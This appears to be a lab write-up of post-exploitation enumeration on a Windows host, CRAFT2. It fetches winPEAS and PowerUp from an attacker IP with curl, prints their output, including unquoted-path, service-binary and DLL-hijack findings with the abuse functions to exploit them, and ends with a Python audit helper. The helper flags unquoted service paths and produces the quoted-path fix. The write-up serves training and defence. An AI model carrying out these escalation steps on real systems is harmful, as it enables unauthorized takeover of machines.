PEAS


Conducting an automated enumeration after performing a manual enumeration on the CRAFT2 host.

PS C:\xampp\htdocs> curl http://192.168.45.158/winPEASany.exe -OutFile .\winPEASany.exe

Delivery complete

Executing PEAS

ENV


╔══════════╣ User Environment Variables
╚ Check for some passwords or keys in the env variables
    COMPUTERNAME: CRAFT2
    USERPROFILE: C:\Users\apache
    PUBLIC: C:\Users\Public
    LOCALAPPDATA: C:\Users\apache\AppData\Local
    PSModulePath: C:\Users\apache\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
    PROCESSOR_ARCHITECTURE: AMD64
    Path: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\apache\AppData\Local\Microsoft\WindowsApps
    CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
    ProgramFiles(x86): C:\Program Files (x86)
    PROCESSOR_LEVEL: 25
    ProgramFiles: C:\Program Files
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
    PSExecutionPolicyPreference: Bypass
    SystemRoot: C:\Windows
    ALLUSERSPROFILE: C:\ProgramData
    DriverData: C:\Windows\System32\Drivers\DriverData
    AP_PARENT_PID: 2196
    ProgramData: C:\ProgramData
    PROCESSOR_REVISION: 0101
    USERNAME: apache
    CommonProgramW6432: C:\Program Files\Common Files
    CommonProgramFiles: C:\Program Files\Common Files
    OS: Windows_NT
    PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
    ComSpec: C:\Windows\system32\cmd.exe
    PROMPT: $P$G
    SystemDrive: C:
    TEMP: C:\Users\apache\AppData\Local\Temp
    NUMBER_OF_PROCESSORS: 2
    APPDATA: C:\Users\apache\AppData\Roaming
    TMP: C:\Users\apache\AppData\Local\Temp
    ProgramW6432: C:\Program Files
    windir: C:\Windows
    USERDOMAIN: CRAFT2
 
╔══════════╣ System Environment Variables
╚ Check for some passwords or keys in the env variables
    ComSpec: C:\Windows\system32\cmd.exe
    DriverData: C:\Windows\System32\Drivers\DriverData
    OS: Windows_NT
    Path: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
    PROCESSOR_ARCHITECTURE: AMD64
    PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
    TEMP: C:\Windows\TEMP
    TMP: C:\Windows\TEMP
    USERNAME: SYSTEM
    windir: C:\Windows
    NUMBER_OF_PROCESSORS: 2
    PROCESSOR_LEVEL: 25
    PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
    PROCESSOR_REVISION: 0101

N/A


UAC


PowerShell


Events


Event log is readable

NTLM


Token Privileges (apache)


Enumerated

Processes


Services


ApacheHTTPServer

MySQL

ResumeService1

Modifiable


Interesting Files / Directories


PowerUp


PS C:\xampp\htdocs> curl http://192.168.45.158/PowerUp.ps1 -OutFile .\PowerUp.ps1

Delivery complete

PS C:\xampp\htdocs> Invoke-AllChecks
 
 
ServiceName    : ResumeService1
Path           : C:\Program Files\nssm-2.24\win64\nssm.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName      : .\thecybergeek
AbuseFunction  : Write-ServiceBinary -Name 'ResumeService1' -Path <HijackPath>
CanRestart     : False
Name           : ResumeService1
Check          : Unquoted Service Paths
 
ServiceName    : ResumeService1
Path           : C:\Program Files\nssm-2.24\win64\nssm.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName      : .\thecybergeek
AbuseFunction  : Write-ServiceBinary -Name 'ResumeService1' -Path <HijackPath>
CanRestart     : False
Name           : ResumeService1
Check          : Unquoted Service Paths
 
ServiceName                     : ApacheHTTPServer
Path                            : "C:\Xampp\apache\bin\httpd.exe" -k runservice
ModifiableFile                  : C:\Xampp\apache\bin\httpd.exe
ModifiableFilePermissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
ModifiableFileIdentityReference : CRAFT2\apache
StartName                       : .\apache
AbuseFunction                   : Install-ServiceBinary -Name 'ApacheHTTPServer'
CanRestart                      : False
Name                            : ApacheHTTPServer
Check                           : Modifiable Service Files
 
ModifiablePath    : C:\Users\apache\AppData\Local\Microsoft\WindowsApps
IdentityReference : CRAFT2\apache
Permissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH%            : C:\Users\apache\AppData\Local\Microsoft\WindowsApps
Name              : C:\Users\apache\AppData\Local\Microsoft\WindowsApps
Check             : %PATH% .dll Hijacks
AbuseFunction     : Write-HijackDll -DllPath 'C:\Users\apache\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'

Lateral movement to the thecybergeek user is possible by exploiting the ResumeService1 service: it runs as .\thecybergeek and its unquoted path sits under C:\, which BUILTIN\Users can write to. Note that CanRestart is False, so the current user cannot trigger the service restart themselves.
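The "Unquoted Service Paths" check PowerUp reported above can be reproduced as an audit helper. The code below is an added example, not part of this writeup or of PowerUp: it derives the executables Windows would try for an unquoted ImagePath, flags candidates whose parent directory a low-privileged principal can write to, and produces the quoted remediation. The directory ACL data is constructed from the PowerUp output on this page (BUILTIN\Users holding WriteData/AddFile on C:\), not read from a live host.

```python
import ntpath

# Principals whose write access to a service path directory is a finding.
LOW_PRIV_PRINCIPALS = {"BUILTIN\\Users", "Everyone", "NT AUTHORITY\\Authenticated Users"}
WRITE_RIGHTS = {"WriteData/AddFile", "FullControl", "Write", "Modify"}

# Constructed ACL summary mirroring the PowerUp output above (assumption, not live data):
# directory -> {principal: set of rights}
DIR_ACLS = {
    "C:\\": {"BUILTIN\\Users": {"AppendData/AddSubdirectory", "WriteData/AddFile"}},
    "C:\\Program Files": {"NT AUTHORITY\\SYSTEM": {"FullControl"}},
}


def split_binary(image_path: str) -> tuple[str, str]:
    """Split an unquoted ImagePath into (binary path, arguments).

    The binary ends at the first whitespace token carrying .exe; later tokens are arguments.
    """
    tokens = image_path.strip().split()
    end = next((i for i, t in enumerate(tokens) if t.lower().endswith(".exe")), len(tokens) - 1)
    return " ".join(tokens[: end + 1]), " ".join(tokens[end + 1:])


def candidate_paths(image_path: str) -> list[str]:
    """Executables CreateProcess would try before the real one for an unquoted path.

    A quoted path is unambiguous and yields nothing. Otherwise every proper
    whitespace-delimited prefix is a candidate; .exe is appended when it has no extension.
    """
    if image_path.strip().startswith('"'):
        return []
    parts = split_binary(image_path)[0].split()
    candidates = []
    for n in range(1, len(parts)):  # proper prefixes only; the full path is the real binary
        prefix = " ".join(parts[:n])
        candidates.append(prefix if ntpath.splitext(prefix)[1] else prefix + ".exe")
    return candidates


def audit_service(name: str, image_path: str) -> list[dict]:
    """One finding per candidate whose directory a low-privileged principal can write to."""
    findings = []
    for cand in candidate_paths(image_path):
        acl = DIR_ACLS.get(ntpath.dirname(cand), {})
        who = sorted(p for p, r in acl.items() if p in LOW_PRIV_PRINCIPALS and r & WRITE_RIGHTS)
        if who:
            findings.append({"service": name, "candidate": cand, "writable_by": who})
    return findings


def quoted_image_path(image_path: str) -> str:
    """Remediated ImagePath: binary wrapped in quotes, arguments left untouched."""
    if image_path.strip().startswith('"'):
        return image_path.strip()
    binary, args = split_binary(image_path)
    return f'"{binary}"' + (f" {args}" if args else "")
```

On a real host the ACL map would be filled from Get-Acl on each candidate's directory, and the quoted path applied with sc.exe config binPath=.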